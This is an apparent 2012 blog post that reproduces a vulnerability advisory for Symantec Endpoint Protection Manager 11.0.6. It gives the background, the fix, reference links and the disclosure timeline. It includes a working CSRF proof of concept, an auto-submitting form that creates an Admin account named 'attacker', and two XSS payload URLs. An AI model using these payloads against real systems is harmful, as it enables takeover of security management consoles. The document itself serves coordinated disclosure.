Saturday, April 28, 2012

Symantec Endpoint Protection Manager 11.0.6 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities

Description
Symantec End point Protection Manager Console lets user centrally manages the Symantec End point Protection clients. From the console user can install clients, set and enforce a securit ypolicy, and monitor and report on the clients. The console can be run from the computer hosting Symantec Endpoint Protection Manager or remotely through a Web-based interface.

Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in Symantec Endpoint Protection Manager. These issues were discovered in a default installation of Symantec Endpoint Protection Manager 11.0.6. Other earlier versions may also be affected.


Proof of concept
Cross-Site Request Forgery (CSRF)
==========================

<html>
<body>
<form action="https://[target]:8443/portal/Settings.jsp?action=NewAccount"
id="csrf" method="post">
<input type="hidden" name="spcName" value="attacker" />
<input type="hidden" name="spcUsername" value="attacker" />
<input type="hidden" name="spcNewPwd" value="passwd123" />
<input type="hidden" name="spcNewPwd2" value="passwd123" />
<input type="hidden" name="group1" value="Admin" />
<input type="hidden" name="btnSubmit" value="Create+Account" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>

Cross-Site Scripting (XSS)
====================

  • https://[target]:8443/console/apps/sepm/?>'"><script>alert(1)</script>
  • https://[target]:8443/portal/Help.jsp?token='"--></style></script><script>alert(1)</script>


Solution
Symantec has released patches which address these issues. Please see the references for more information.

References

Vendor URL: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110810_00
Secunia: http://secunia.com/advisories/43662/

Disclosure Timeline
2011-03-07 - Vulnerabilities discovered.
2011-03-07 - Vulnerabilities reported to Secunia.
2011-03-09 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-08-10 - 
Patch released.
2011-08-11 - 
Advisory published by Secunia.

No comments:

Post a Comment